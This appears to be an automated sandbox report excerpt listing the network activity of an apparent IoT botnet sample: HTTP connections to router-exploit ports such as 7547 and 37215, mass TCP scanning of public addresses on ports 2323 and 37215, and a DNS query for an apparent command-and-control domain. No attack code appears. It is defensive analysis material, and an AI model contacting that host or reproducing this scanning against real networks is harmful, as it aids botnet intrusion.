            Source: unknownNetwork traffic detected: HTTP traffic on port 54970 -> 7547
            Source: unknownNetwork traffic detected: HTTP traffic on port 41142 -> 7547
            Source: unknownNetwork traffic detected: HTTP traffic on port 41150 -> 37215
            Source: unknownNetwork traffic detected: HTTP traffic on port 35630 -> 7547
            Source: unknownNetwork traffic detected: HTTP traffic on port 57030 -> 60001
            Source: unknownNetwork traffic detected: HTTP traffic on port 48736 -> 7547
            Source: unknownNetwork traffic detected: HTTP traffic on port 48474 -> 52869
            Source: unknownNetwork traffic detected: HTTP traffic on port 48466 -> 52869
            Source: unknownNetwork traffic detected: HTTP traffic on port 44076 -> 7547
            Source: unknownNetwork traffic detected: HTTP traffic on port 32818 -> 52869
            Source: unknownNetwork traffic detected: HTTP traffic on port 51334 -> 37215
            Source: unknownNetwork traffic detected: HTTP traffic on port 57016 -> 7547
            Source: unknownNetwork traffic detected: HTTP traffic on port 7547 -> 57016
            Source: unknownNetwork traffic detected: HTTP traffic on port 53108 -> 7547
            Source: unknownNetwork traffic detected: HTTP traffic on port 56158 -> 7547
            Source: unknownNetwork traffic detected: HTTP traffic on port 7547 -> 53108
            Source: unknownNetwork traffic detected: HTTP traffic on port 7547 -> 56158
            Source: unknownNetwork traffic detected: HTTP traffic on port 38904 -> 7547
            Source: unknownNetwork traffic detected: HTTP traffic on port 55508 -> 52869
            Source: unknownNetwork traffic detected: HTTP traffic on port 36066 -> 7547
            Source: unknownNetwork traffic detected: HTTP traffic on port 36066 -> 7547
            Source: unknownNetwork traffic detected: HTTP traffic on port 36066 -> 7547
            Source: unknownNetwork traffic detected: HTTP traffic on port 44594 -> 7547
            Source: unknownNetwork traffic detected: HTTP traffic on port 57380 -> 7547
            Source: unknownNetwork traffic detected: HTTP traffic on port 41058 -> 7547
            Source: unknownNetwork traffic detected: HTTP traffic on port 36066 -> 7547
            Source: unknownNetwork traffic detected: HTTP traffic on port 48466 -> 52869
            Source: unknownNetwork traffic detected: HTTP traffic on port 48474 -> 52869
            Source: unknownNetwork traffic detected: HTTP traffic on port 41058 -> 7547
            Source: unknownNetwork traffic detected: HTTP traffic on port 41058 -> 7547
            Source: unknownNetwork traffic detected: HTTP traffic on port 32818 -> 52869
            Source: unknownNetwork traffic detected: HTTP traffic on port 36066 -> 7547
            Source: unknownNetwork traffic detected: HTTP traffic on port 52124 -> 7547
            Source: unknownNetwork traffic detected: HTTP traffic on port 51748 -> 7547
            Source: unknownNetwork traffic detected: HTTP traffic on port 41058 -> 7547
            Source: unknownNetwork traffic detected: HTTP traffic on port 7547 -> 51748
            Source: unknownNetwork traffic detected: HTTP traffic on port 38626 -> 52869
            Source: unknownNetwork traffic detected: HTTP traffic on port 38636 -> 52869
            Source: unknownNetwork traffic detected: HTTP traffic on port 48736 -> 7547
            Source: unknownNetwork traffic detected: HTTP traffic on port 49598 -> 7547
            Source: unknownNetwork traffic detected: HTTP traffic on port 47360 -> 60001
            Source: unknownNetwork traffic detected: HTTP traffic on port 7547 -> 49598
            Source: unknownNetwork traffic detected: HTTP traffic on port 51334 -> 37215
            Source: unknownNetwork traffic detected: HTTP traffic on port 41150 -> 37215
            Source: unknownNetwork traffic detected: HTTP traffic on port 52428 -> 7547
            Source: unknownNetwork traffic detected: HTTP traffic on port 41058 -> 7547
            Source: unknownNetwork traffic detected: HTTP traffic on port 47360 -> 60001
            Source: unknownNetwork traffic detected: HTTP traffic on port 36066 -> 7547
            Source: unknownNetwork traffic detected: HTTP traffic on port 38278 -> 60001
            Source: unknownNetwork traffic detected: HTTP traffic on port 38278 -> 60001
            Source: unknownNetwork traffic detected: HTTP traffic on port 38278 -> 60001
            Source: unknownNetwork traffic detected: HTTP traffic on port 47360 -> 60001
            Source: unknownNetwork traffic detected: HTTP traffic on port 33850 -> 52869
            Source: unknownNetwork traffic detected: HTTP traffic on port 56512 -> 52869
            Source: unknownNetwork traffic detected: HTTP traffic on port 56548 -> 52869
            Source: unknownNetwork traffic detected: HTTP traffic on port 52869 -> 56512
            Source: unknownNetwork traffic detected: HTTP traffic on port 52869 -> 56548
            Source: unknownNetwork traffic detected: HTTP traffic on port 38278 -> 60001
            Source: unknownNetwork traffic detected: HTTP traffic on port 34102 -> 7547
            Source: unknownNetwork traffic detected: HTTP traffic on port 56024 -> 7547
            Source: unknownNetwork traffic detected: HTTP traffic on port 41688 -> 7547
            Source: unknownNetwork traffic detected: HTTP traffic on port 7547 -> 41688
            Source: unknownNetwork traffic detected: HTTP traffic on port 58996 -> 7547
            Source: unknownNetwork traffic detected: HTTP traffic on port 34102 -> 7547
            Source: unknownNetwork traffic detected: HTTP traffic on port 58996 -> 7547
            Source: unknownNetwork traffic detected: HTTP traffic on port 34102 -> 7547
            Source: unknownNetwork traffic detected: HTTP traffic on port 49252 -> 37215
            Source: unknownNetwork traffic detected: HTTP traffic on port 49252 -> 37215
            Source: unknownNetwork traffic detected: HTTP traffic on port 38278 -> 60001
            Source: unknownNetwork traffic detected: HTTP traffic on port 58996 -> 7547
            Source: unknownNetwork traffic detected: HTTP traffic on port 56024 -> 7547
            Source: unknownNetwork traffic detected: HTTP traffic on port 49252 -> 37215
            Source: unknownNetwork traffic detected: HTTP traffic on port 34102 -> 7547
            Source: unknownNetwork traffic detected: HTTP traffic on port 47360 -> 60001
            Source: unknownNetwork traffic detected: HTTP traffic on port 57030 -> 60001
            Source: unknownNetwork traffic detected: HTTP traffic on port 46206 -> 52869
            Source: unknownNetwork traffic detected: HTTP traffic on port 46196 -> 52869
            Source: unknownNetwork traffic detected: HTTP traffic on port 49252 -> 37215
            Source: unknownNetwork traffic detected: HTTP traffic on port 58996 -> 7547
            Source: unknownNetwork traffic detected: HTTP traffic on port 41058 -> 7547
            Source: unknownNetwork traffic detected: HTTP traffic on port 56024 -> 7547
            Source: unknownNetwork traffic detected: HTTP traffic on port 43532 -> 37215
            Source: unknownNetwork traffic detected: HTTP traffic on port 34102 -> 7547
            Source: unknownNetwork traffic detected: HTTP traffic on port 34574 -> 37215
            Source: unknownNetwork traffic detected: HTTP traffic on port 49252 -> 37215
            Source: unknownNetwork traffic detected: HTTP traffic on port 43532 -> 37215
            Source: unknownNetwork traffic detected: HTTP traffic on port 58996 -> 7547
            Source: unknownNetwork traffic detected: HTTP traffic on port 38278 -> 60001
            Source: unknownNetwork traffic detected: HTTP traffic on port 34574 -> 37215
            Source: unknownNetwork traffic detected: HTTP traffic on port 36066 -> 7547
            Source: unknownNetwork traffic detected: HTTP traffic on port 34574 -> 37215
            Source: unknownNetwork traffic detected: HTTP traffic on port 56024 -> 7547
            Source: unknownNetwork traffic detected: HTTP traffic on port 48474 -> 52869
            Source: unknownNetwork traffic detected: HTTP traffic on port 48466 -> 52869
            Source: unknownNetwork traffic detected: HTTP traffic on port 41712 -> 7547
            Source: unknownNetwork traffic detected: HTTP traffic on port 7547 -> 41712
            Source: unknownNetwork traffic detected: HTTP traffic on port 43532 -> 37215
            Source: unknownNetwork traffic detected: HTTP traffic on port 34102 -> 7547
            Source: unknownNetwork traffic detected: HTTP traffic on port 37950 -> 37215
            Source: unknownNetwork traffic detected: HTTP traffic on port 34574 -> 37215
            Source: unknownNetwork traffic detected: HTTP traffic on port 49252 -> 37215
            Source: unknownNetwork traffic detected: HTTP traffic on port 47360 -> 60001
            Source: unknownNetwork traffic detected: HTTP traffic on port 37422 -> 7547
            Source: unknownNetwork traffic detected: HTTP traffic on port 41898 -> 60001
            Source: unknownNetwork traffic detected: HTTP traffic on port 41898 -> 60001
            Source: unknownNetwork traffic detected: HTTP traffic on port 37950 -> 37215
            Source: unknownNetwork traffic detected: HTTP traffic on port 45368 -> 52869
            Source: unknownNetwork traffic detected: HTTP traffic on port 54966 -> 52869
            Source: unknownNetwork traffic detected: HTTP traffic on port 54416 -> 52869
            Source: unknownNetwork traffic detected: HTTP traffic on port 54974 -> 52869
            Source: unknownNetwork traffic detected: HTTP traffic on port 45374 -> 52869
            Source: unknownNetwork traffic detected: HTTP traffic on port 54426 -> 52869
            Source: unknownNetwork traffic detected: HTTP traffic on port 54966 -> 52869
            Source: unknownNetwork traffic detected: HTTP traffic on port 54974 -> 52869
            Source: unknownNetwork traffic detected: HTTP traffic on port 45368 -> 52869
            Source: unknownNetwork traffic detected: HTTP traffic on port 45374 -> 52869
            Source: unknownNetwork traffic detected: HTTP traffic on port 58996 -> 7547
            Source: unknownNetwork traffic detected: HTTP traffic on port 54966 -> 52869
            Source: unknownNetwork traffic detected: HTTP traffic on port 54974 -> 52869
            Source: unknownNetwork traffic detected: HTTP traffic on port 45368 -> 52869
            Source: unknownNetwork traffic detected: HTTP traffic on port 45374 -> 52869
            Source: unknownNetwork traffic detected: HTTP traffic on port 41898 -> 60001
            Source: unknownNetwork traffic detected: HTTP traffic on port 32818 -> 52869
            Source: unknownNetwork traffic detected: HTTP traffic on port 54966 -> 52869
            Source: unknownNetwork traffic detected: HTTP traffic on port 54974 -> 52869
            Source: unknownNetwork traffic detected: HTTP traffic on port 37950 -> 37215
            Source: unknownNetwork traffic detected: HTTP traffic on port 59360 -> 7547
            Source: unknownNetwork traffic detected: HTTP traffic on port 52718 -> 7547
            Source: unknownNetwork traffic detected: HTTP traffic on port 50276 -> 7547
            Source: unknownNetwork traffic detected: HTTP traffic on port 58952 -> 7547
            Source: unknownNetwork traffic detected: HTTP traffic on port 45368 -> 52869
            Source: unknownNetwork traffic detected: HTTP traffic on port 45374 -> 52869
            Source: unknownNetwork traffic detected: HTTP traffic on port 42364 -> 7547
            Source: unknownNetwork traffic detected: HTTP traffic on port 43532 -> 37215
            Source: unknownNetwork traffic detected: HTTP traffic on port 7547 -> 42364
            Source: unknownNetwork traffic detected: HTTP traffic on port 35616 -> 37215
            Source: unknownNetwork traffic detected: HTTP traffic on port 44730 -> 52869
            Source: unknownNetwork traffic detected: HTTP traffic on port 44744 -> 52869
            Source: unknownNetwork traffic detected: HTTP traffic on port 52869 -> 44730
            Source: unknownNetwork traffic detected: HTTP traffic on port 52869 -> 44744
            Source: unknownNetwork traffic detected: HTTP traffic on port 23 -> 55740
            Source: unknownNetwork traffic detected: HTTP traffic on port 34574 -> 37215
            Source: unknownNetwork traffic detected: HTTP traffic on port 23 -> 55794
            Source: unknownNetwork traffic detected: HTTP traffic on port 43494 -> 37215
            Source: unknownNetwork traffic detected: HTTP traffic on port 54966 -> 52869
            Source: unknownNetwork traffic detected: HTTP traffic on port 54974 -> 52869
            Source: unknownNetwork traffic detected: HTTP traffic on port 38278 -> 60001
            Source: unknownNetwork traffic detected: HTTP traffic on port 56024 -> 7547
            Source: unknownNetwork traffic detected: HTTP traffic on port 23 -> 55838
            Source: unknownNetwork traffic detected: HTTP traffic on port 23 -> 55842
            Source: unknownNetwork traffic detected: HTTP traffic on port 35616 -> 37215
            Source: unknownNetwork traffic detected: HTTP traffic on port 23 -> 55858
            Source: unknownNetwork traffic detected: HTTP traffic on port 44288 -> 37215
            Source: unknownNetwork traffic detected: HTTP traffic on port 23 -> 55868
            Source: unknownNetwork traffic detected: HTTP traffic on port 37950 -> 37215
            Source: unknownNetwork traffic detected: HTTP traffic on port 23 -> 55890
            Source: unknownNetwork traffic detected: HTTP traffic on port 43468 -> 7547
            Source: unknownNetwork traffic detected: HTTP traffic on port 44288 -> 37215
            Source: unknownNetwork traffic detected: HTTP traffic on port 51658 -> 52869
            Source: unknownNetwork traffic detected: HTTP traffic on port 23 -> 56114
            Source: unknownNetwork traffic detected: HTTP traffic on port 35986 -> 52869
            Source: unknownNetwork traffic detected: HTTP traffic on port 33602 -> 52869
            Source: unknownNetwork traffic detected: HTTP traffic on port 34102 -> 7547
            Source: unknownNetwork traffic detected: HTTP traffic on port 51688 -> 52869
            Source: unknownNetwork traffic detected: HTTP traffic on port 43468 -> 7547
            Source: unknownNetwork traffic detected: HTTP traffic on port 35616 -> 37215
            Source: unknownNetwork traffic detected: HTTP traffic on port 23 -> 56160
            Source: unknownNetwork traffic detected: HTTP traffic on port 51688 -> 52869
            Source: unknownNetwork traffic detected: HTTP traffic on port 41058 -> 7547
            Source: unknownNetwork traffic detected: HTTP traffic on port 44288 -> 37215
            Source: unknownNetwork traffic detected: HTTP traffic on port 43468 -> 7547
            Source: unknownNetwork traffic detected: HTTP traffic on port 23 -> 56196
            Source: unknownNetwork traffic detected: HTTP traffic on port 49252 -> 37215
            Source: unknownNetwork traffic detected: HTTP traffic on port 35986 -> 52869
            Source: unknownNetwork traffic detected: HTTP traffic on port 33602 -> 52869
            Source: unknownNetwork traffic detected: HTTP traffic on port 54966 -> 52869
            Source: unknownNetwork traffic detected: HTTP traffic on port 54974 -> 52869
            Source: unknownNetwork traffic detected: HTTP traffic on port 43468 -> 7547
            Source: unknownNetwork traffic detected: HTTP traffic on port 35986 -> 52869
            Source: unknownNetwork traffic detected: HTTP traffic on port 33602 -> 52869
            Source: unknownNetwork traffic detected: HTTP traffic on port 44288 -> 37215
            Source: unknownNetwork traffic detected: HTTP traffic on port 33934 -> 7547
            Source: unknownNetwork traffic detected: HTTP traffic on port 48736 -> 7547
            Source: unknownNetwork traffic detected: HTTP traffic on port 33602 -> 52869
            Source: unknownNetwork traffic detected: HTTP traffic on port 35986 -> 52869
            Source: unknownDNS query: name: amkcnc.duckdns.org
            Source: global trafficTCP traffic: 192.168.2.23:20342 -> 222.23.23.192:2323
            Source: global trafficTCP traffic: 192.168.2.23:20342 -> 60.209.78.253:2323
            Source: global trafficTCP traffic: 192.168.2.23:20342 -> 155.190.239.147:2323
            Source: global trafficTCP traffic: 192.168.2.23:20342 -> 167.225.184.19:2323
            Source: global trafficTCP traffic: 192.168.2.23:20342 -> 137.185.234.82:2323
            Source: global trafficTCP traffic: 192.168.2.23:20342 -> 223.135.170.20:2323
            Source: global trafficTCP traffic: 192.168.2.23:20342 -> 138.16.157.197:2323
            Source: global trafficTCP traffic: 192.168.2.23:20342 -> 102.172.0.195:2323
            Source: global trafficTCP traffic: 192.168.2.23:20342 -> 113.174.49.97:2323
            Source: global trafficTCP traffic: 192.168.2.23:20342 -> 88.246.76.183:2323
            Source: global trafficTCP traffic: 192.168.2.23:20342 -> 85.13.255.31:2323
            Source: global trafficTCP traffic: 192.168.2.23:20342 -> 66.233.165.84:2323
            Source: global trafficTCP traffic: 192.168.2.23:20342 -> 37.208.204.160:2323
            Source: global trafficTCP traffic: 192.168.2.23:20342 -> 49.47.7.148:2323
            Source: global trafficTCP traffic: 192.168.2.23:20342 -> 18.0.233.213:2323
            Source: global trafficTCP traffic: 192.168.2.23:20342 -> 216.165.172.91:2323
            Source: global trafficTCP traffic: 192.168.2.23:20342 -> 118.24.215.130:2323
            Source: global trafficTCP traffic: 192.168.2.23:20342 -> 60.206.247.20:2323
            Source: global trafficTCP traffic: 192.168.2.23:20342 -> 210.87.221.6:2323
            Source: global trafficTCP traffic: 192.168.2.23:20342 -> 72.153.70.51:2323
            Source: global trafficTCP traffic: 192.168.2.23:20342 -> 194.143.151.212:2323
            Source: global trafficTCP traffic: 192.168.2.23:20342 -> 141.211.229.80:2323
            Source: global trafficTCP traffic: 192.168.2.23:20342 -> 133.22.111.217:2323
            Source: global trafficTCP traffic: 192.168.2.23:20342 -> 132.83.174.228:2323
            Source: global trafficTCP traffic: 192.168.2.23:20342 -> 213.80.56.202:2323
            Source: global trafficTCP traffic: 192.168.2.23:20342 -> 167.18.68.161:2323
            Source: global trafficTCP traffic: 192.168.2.23:20342 -> 171.36.94.189:2323
            Source: global trafficTCP traffic: 192.168.2.23:20342 -> 64.230.20.248:2323
            Source: global trafficTCP traffic: 192.168.2.23:20342 -> 103.112.157.203:2323
            Source: global trafficTCP traffic: 192.168.2.23:20342 -> 146.225.42.33:2323
            Source: global trafficTCP traffic: 192.168.2.23:20342 -> 54.18.155.87:2323
            Source: global trafficTCP traffic: 192.168.2.23:20342 -> 187.171.191.112:2323
            Source: global trafficTCP traffic: 192.168.2.23:20342 -> 223.253.137.248:2323
            Source: global trafficTCP traffic: 192.168.2.23:20342 -> 84.196.163.30:2323
            Source: global trafficTCP traffic: 192.168.2.23:20342 -> 138.7.99.103:2323
            Source: global trafficTCP traffic: 192.168.2.23:20342 -> 188.30.145.221:2323
            Source: global trafficTCP traffic: 192.168.2.23:20342 -> 82.54.125.154:2323
            Source: global trafficTCP traffic: 192.168.2.23:20342 -> 204.118.194.239:2323
            Source: global trafficTCP traffic: 192.168.2.23:20342 -> 9.223.237.177:2323
            Source: global trafficTCP traffic: 192.168.2.23:20342 -> 186.92.240.4:2323
            Source: global trafficTCP traffic: 192.168.2.23:20342 -> 36.213.135.179:2323
            Source: global trafficTCP traffic: 192.168.2.23:20342 -> 81.146.215.83:2323
            Source: global trafficTCP traffic: 192.168.2.23:20342 -> 143.80.217.26:2323
            Source: global trafficTCP traffic: 192.168.2.23:20342 -> 191.3.234.38:2323
            Source: global trafficTCP traffic: 192.168.2.23:20342 -> 200.85.53.199:2323
            Source: global trafficTCP traffic: 192.168.2.23:20342 -> 205.41.245.125:2323
            Source: global trafficTCP traffic: 192.168.2.23:20342 -> 27.221.194.99:2323
            Source: global trafficTCP traffic: 192.168.2.23:20342 -> 46.255.116.192:2323
            Source: global trafficTCP traffic: 192.168.2.23:20342 -> 199.58.188.11:2323
            Source: global trafficTCP traffic: 192.168.2.23:20342 -> 154.45.37.50:2323
            Source: global trafficTCP traffic: 192.168.2.23:20342 -> 161.18.31.175:2323
            Source: global trafficTCP traffic: 192.168.2.23:20342 -> 114.23.140.81:2323
            Source: global trafficTCP traffic: 192.168.2.23:20340 -> 197.23.151.192:37215
            Source: global trafficTCP traffic: 192.168.2.23:20340 -> 197.28.129.191:37215
            Source: global trafficTCP traffic: 192.168.2.23:20340 -> 41.30.39.192:37215
            Source: global trafficTCP traffic: 192.168.2.23:20340 -> 41.225.53.197:37215
            Source: global trafficTCP traffic: 192.168.2.23:20340 -> 41.171.176.169:37215
            Source: global trafficTCP traffic: 192.168.2.23:20340 -> 46.174.178.107:37215
            Source: global trafficTCP traffic: 192.168.2.23:20340 -> 157.212.7.181:37215
            Source: global trafficTCP traffic: 192.168.2.23:20340 -> 197.234.89.192:37215
            Source: global trafficTCP traffic: 192.168.2.23:20340 -> 41.58.62.43:37215
            Source: global trafficTCP traffic: 192.168.2.23:20340 -> 197.27.56.4:37215
            Source: global trafficTCP traffic: 192.168.2.23:20340 -> 157.164.50.142:37215
            Source: global trafficTCP traffic: 192.168.2.23:20340 -> 139.221.250.175:37215
            Source: global trafficTCP traffic: 192.168.2.23:20340 -> 207.13.148.208:37215
            Source: global trafficTCP traffic: 192.168.2.23:20340 -> 157.252.227.70:37215
            Source: global trafficTCP traffic: 192.168.2.23:20340 -> 157.26.11.216:37215
            Source: global trafficTCP traffic: 192.168.2.23:20340 -> 160.54.109.46:37215
            Source: global trafficTCP traffic: 192.168.2.23:20340 -> 41.151.55.233:37215
            Source: global trafficTCP traffic: 192.168.2.23:20340 -> 190.124.97.203:37215
            Source: global trafficTCP traffic: 192.168.2.23:20340 -> 197.58.20.109:37215
            Source: global trafficTCP traffic: 192.168.2.23:20340 -> 41.13.74.120:37215
            Source: global trafficTCP traffic: 192.168.2.23:20340 -> 197.71.253.161:37215
            Source: global trafficTCP traffic: 192.168.2.23:20340 -> 48.187.42.166:37215
            Source: global trafficTCP traffic: 192.168.2.23:20340 -> 41.25.229.53:37215
            Source: global trafficTCP traffic: 192.168.2.23:20340 -> 32.28.87.93:37215
            Source: global trafficTCP traffic: 192.168.2.23:20340 -> 41.80.248.146:37215
            Source: global trafficTCP traffic: 192.168.2.23:20340 -> 197.50.95.32:37215
            Source: global trafficTCP traffic: 192.168.2.23:20340 -> 113.187.194.238:37215
            Source: global trafficTCP traffic: 192.168.2.23:20340 -> 197.191.19.162:37215
            Source: global trafficTCP traffic: 192.168.2.23:20340 -> 197.198.128.244:37215
            Source: global trafficTCP traffic: 192.168.2.23:20340 -> 72.229.46.109:37215
            Source: global trafficTCP traffic: 192.168.2.23:20340 -> 197.53.60.106:37215
            Source: global trafficTCP traffic: 192.168.2.23:20340 -> 41.156.251.195:37215
            Source: global trafficTCP traffic: 192.168.2.23:20340 -> 197.255.68.249:37215
            Source: global trafficTCP traffic: 192.168.2.23:20340 -> 143.215.59.140:37215
            Source: global trafficTCP traffic: 192.168.2.23:20340 -> 197.31.47.198:37215
            Source: global trafficTCP traffic: 192.168.2.23:20340 -> 157.176.217.138:37215
            Source: global trafficTCP traffic: 192.168.2.23:20340 -> 41.207.13.47:37215
            Source: global trafficTCP traffic: 192.168.2.23:20340 -> 197.145.241.115:37215
            Source: global trafficTCP traffic: 192.168.2.23:20340 -> 114.57.71.122:37215
            Source: global trafficTCP traffic: 192.168.2.23:20340 -> 41.58.183.231:37215
            Source: global trafficTCP traffic: 192.168.2.23:20340 -> 202.63.149.4:37215
            Source: global trafficTCP traffic: 192.168.2.23:20340 -> 197.218.34.112:37215
            Source: global trafficTCP traffic: 192.168.2.23:20340 -> 157.10.87.226:37215
            Source: global trafficTCP traffic: 192.168.2.23:20340 -> 144.42.52.196:37215
            Source: global trafficTCP traffic: 192.168.2.23:20340 -> 197.20.178.232:37215
            Source: global trafficTCP traffic: 192.168.2.23:20340 -> 41.109.124.206:37215
            Source: global trafficTCP traffic: 192.168.2.23:20340 -> 78.22.25.16:37215
            Source: global trafficTCP traffic: 192.168.2.23:20340 -> 52.10.107.227:37215
            Source: global trafficTCP traffic: 192.168.2.23:20340 -> 157.207.100.193:37215
            Source: global trafficTCP traffic: 192.168.2.23:20340 -> 92.126.156.47:37215
            Source: global trafficTCP traffic: 192.168.2.23:20340 -> 41.79.48.124:37215
            Source: global trafficTCP traffic: 192.168.2.23:20340 -> 197.99.194.149:37215
            Source: global trafficTCP traffic: 192.168.2.23:20340 -> 41.169.191.229:37215
            Source: global trafficTCP traffic: 192.168.2.23:20340 -> 197.54.186.81:37215
            Source: global trafficTCP traffic: 192.168.2.23:20340 -> 41.148.19.107:37215
            Source: global trafficTCP traffic: 192.168.2.23:20340 -> 41.86.62.46:37215
            Source: global trafficTCP traffic: 192.168.2.23:20340 -> 197.76.242.114:37215
            Source: global trafficTCP traffic: 192.168.2.23:20340 -> 74.11.45.46:37215
            Source: global trafficTCP traffic: 192.168.2.23:20340 -> 41.73.221.133:37215
            Source: global trafficTCP traffic: 192.168.2.23:20340 -> 157.66.246.253:37215
            Source: global trafficTCP traffic: 192.168.2.23:20340 -> 197.233.118.181:37215
            Source: global trafficTCP traffic: 192.168.2.23:20340 -> 197.240.113.123:37215
            Source: global trafficTCP traffic: 192.168.2.23:20340 -> 41.44.194.143:37215
            Source: global trafficTCP traffic: 192.168.2.23:20340 -> 197.21.40.146:37215
            Source: global trafficTCP traffic: 192.168.2.23:20340 -> 51.15.212.28:37215
            Source: global trafficTCP traffic: 192.168.2.23:20340 -> 197.79.241.80:37215
            Source: global trafficTCP traffic: 192.168.2.23:20340 -> 41.191.17.62:37215
            Source: global trafficTCP traffic: 192.168.2.23:20340 -> 157.70.231.149:37215
            Source: global trafficTCP traffic: 192.168.2.23:20340 -> 41.51.71.218:37215
            Source: global trafficTCP traffic: 192.168.2.23:20340 -> 197.28.119.195:37215
            Source: global trafficTCP traffic: 192.168.2.23:20340 -> 41.150.210.163:37215
            Source: global trafficTCP traffic: 192.168.2.23:20340 -> 157.186.115.160:37215
            Source: global trafficTCP traffic: 192.168.2.23:20340 -> 157.132.15.1:37215
            Source: global trafficTCP traffic: 192.168.2.23:20340 -> 41.223.187.29:37215
            Source: global trafficTCP traffic: 192.168.2.23:20340 -> 41.210.112.182:37215
            Source: global trafficTCP traffic: 192.168.2.23:20340 -> 157.206.225.112:37215
            Source: global trafficTCP traffic: 192.168.2.23:20340 -> 157.90.244.85:37215
            Source: global trafficTCP traffic: 192.168.2.23:20340 -> 129.16.142.211:37215
            Source: global trafficTCP traffic: 192.168.2.23:20340 -> 157.113.221.246:37215
            Source: global trafficTCP traffic: 192.168.2.23:20340 -> 50.240.217.50:37215
            Source: global trafficTCP traffic: 192.168.2.23:20340 -> 41.65.235.91:37215
            Source: global trafficTCP traffic: 192.168.2.23:20340 -> 197.90.123.98:37215
            Source: global trafficTCP traffic: 192.168.2.23:20340 -> 41.191.104.97:37215
            Source: global trafficTCP traffic: 192.168.2.23:20340 -> 41.175.58.209:37215
            Source: global trafficTCP traffic: 192.168.2.23:20340 -> 41.74.12.43:37215
            Source: global trafficTCP traffic: 192.168.2.23:20340 -> 197.194.112.206:37215
            Source: global trafficTCP traffic: 192.168.2.23:20340 -> 197.148.15.219:37215
            Source: global trafficTCP traffic: 192.168.2.23:20340 -> 41.30.127.206:37215
            Source: global trafficTCP traffic: 192.168.2.23:20340 -> 41.104.192.131:37215
            Source: global trafficTCP traffic: 192.168.2.23:20340 -> 41.123.34.81:37215
            Source: global trafficTCP traffic: 192.168.2.23:20340 -> 197.170.125.170:37215
            Source: global trafficTCP traffic: 192.168.2.23:20340 -> 157.187.123.243:37215
            Source: global trafficTCP traffic: 192.168.2.23:20340 -> 157.222.167.219:37215
            Source: global trafficTCP traffic: 192.168.2.23:20340 -> 157.144.164.147:37215
            Source: global trafficTCP traffic: 192.168.2.23:20340 -> 70.0.199.163:37215
            Source: global trafficTCP traffic: 192.168.2.23:20340 -> 41.19.235.188:37215
            Source: global trafficTCP traffic: 192.168.2.23:20340 -> 181.172.14.144:37215
            Source: global trafficTCP traffic: 192.168.2.23:20340 -> 157.185.169.35:37215
            Source: global trafficTCP traffic: 192.168.2.23:20340 -> 197.15.245.237:37215
            Source: global trafficTCP traffic: 192.168.2.23:20340 -> 197.54.247.77:37215
            Source: global trafficTCP traffic: 192.168.2.23:20340 -> 41.208.206.73:37215
            Source: global trafficTCP traffic: 192.168.2.23:20340 -> 157.206.152.110:37215
            Source: global trafficTCP traffic: 192.168.2.23:20340 -> 157.52.73.198:37215
            Source: global trafficTCP traffic: 192.168.2.23:20340 -> 157.247.117.29:37215
            Source: global trafficTCP traffic: 192.168.2.23:20340 -> 41.241.210.180:37215
            Source: global trafficTCP traffic: 192.168.2.23:20340 -> 157.121.135.57:37215
            Source: global trafficTCP traffic: 192.168.2.23:20340 -> 41.172.5.34:37215
            Source: global trafficTCP traffic: 192.168.2.23:20340 -> 41.210.127.92:37215
            Source: global trafficTCP traffic: 192.168.2.23:20340 -> 197.42.166.164:37215
            Source: global trafficTCP traffic: 192.168.2.23:20340 -> 54.85.195.126:37215
            Source: global trafficTCP traffic: 192.168.2.23:20340 -> 58.36.184.229:37215
            Source: global trafficTCP traffic: 192.168.2.23:20340 -> 157.225.119.239:37215
            Source: global trafficTCP traffic: 192.168.2.23:20340 -> 157.179.142.97:37215
            Source: global trafficTCP traffic: 192.168.2.23:20340 -> 157.38.166.169:37215
            Source: global trafficTCP traffic: 192.168.2.23:20340 -> 87.147.71.61:37215
            Source: global trafficTCP traffic: 192.168.2.23:20340 -> 157.214.59.233:37215
            Source: global trafficTCP traffic: 192.168.2.23:20340 -> 41.17.66.210:37215
            Source: global trafficTCP traffic: 192.168.2.23:20340 -> 157.123.101.3:37215
            Source: global trafficTCP traffic: 192.168.2.23:20340 -> 157.38.204.178:37215
            Source: global trafficTCP traffic: 192.168.2.23:20340 -> 197.122.42.180:37215
            Source: global trafficTCP traffic: 192.168.2.23:20340 -> 103.74.229.148:37215
            Source: global trafficTCP traffic: 192.168.2.23:20340 -> 41.115.164.136:37215
            Source: global trafficTCP traffic: 192.168.2.23:20340 -> 41.239.215.75:37215
            Source: global trafficTCP traffic: 192.168.2.23:20340 -> 114.167.200.8:37215
            Source: global trafficTCP traffic: 192.168.2.23:20340 -> 157.160.222.94:37215
            Source: global trafficTCP traffic: 192.168.2.23:20340 -> 41.190.108.131:37215
            Source: global trafficTCP traffic: 192.168.2.23:20340 -> 42.83.138.227:37215
            Source: global trafficTCP traffic: 192.168.2.23:20340 -> 41.189.15.230:37215
            Source: global trafficTCP traffic: 192.168.2.23:20340 -> 41.201.79.101:37215
            Source: global trafficTCP traffic: 192.168.2.23:20340 -> 2.250.9.223:37215
            Source: global trafficTCP traffic: 192.168.2.23:20340 -> 41.255.81.29:37215
            Source: global trafficTCP traffic: 192.168.2.23:20340 -> 41.234.231.232:37215
            Source: global trafficTCP traffic: 192.168.2.23:20340 -> 197.210.190.37:37215
            Source: global trafficTCP traffic: 192.168.2.23:20340 -> 197.122.150.166:37215
            Source: global trafficTCP traffic: 192.168.2.23:20340 -> 41.189.163.231:37215
            Source: global trafficTCP traffic: 192.168.2.23:20340 -> 36.52.85.49:37215
            Source: global trafficTCP traffic: 192.168.2.23:20340 -> 197.1.211.100:37215
            Source: global trafficTCP traffic: 192.168.2.23:20340 -> 41.13.95.63:37215
            Source: global trafficTCP traffic: 192.168.2.23:20340 -> 41.247.68.177:37215
            Source: global trafficTCP traffic: 192.168.2.23:20340 -> 41.47.247.85:37215
            Source: global trafficTCP traffic: 192.168.2.23:20340 -> 41.193.179.103:37215
            Source: global trafficTCP traffic: 192.168.2.23:20340 -> 41.165.248.60:37215
            Source: global trafficTCP traffic: 192.168.2.23:20340 -> 41.24.48.171:37215
            Source: global trafficTCP traffic: 192.168.2.23:20340 -> 32.12.7.187:37215
            Source: global trafficTCP traffic: 192.168.2.23:20340 -> 197.38.180.90:37215
            Source: global trafficTCP traffic: 192.168.2.23:20340 -> 126.60.252.137:37215
            Source: global trafficTCP traffic: 192.168.2.23:20340 -> 41.60.59.77:37215
            Source: global trafficTCP traffic: 192.168.2.23:20340 -> 157.41.208.204:37215
            Source: global trafficTCP traffic: 192.168.2.23:20340 -> 157.205.230.185:37215
            Source: global trafficTCP traffic: 192.168.2.23:20340 -> 50.134.188.182:37215
            Source: global trafficTCP traffic: 192.168.2.23:20340 -> 157.60.177.218:37215
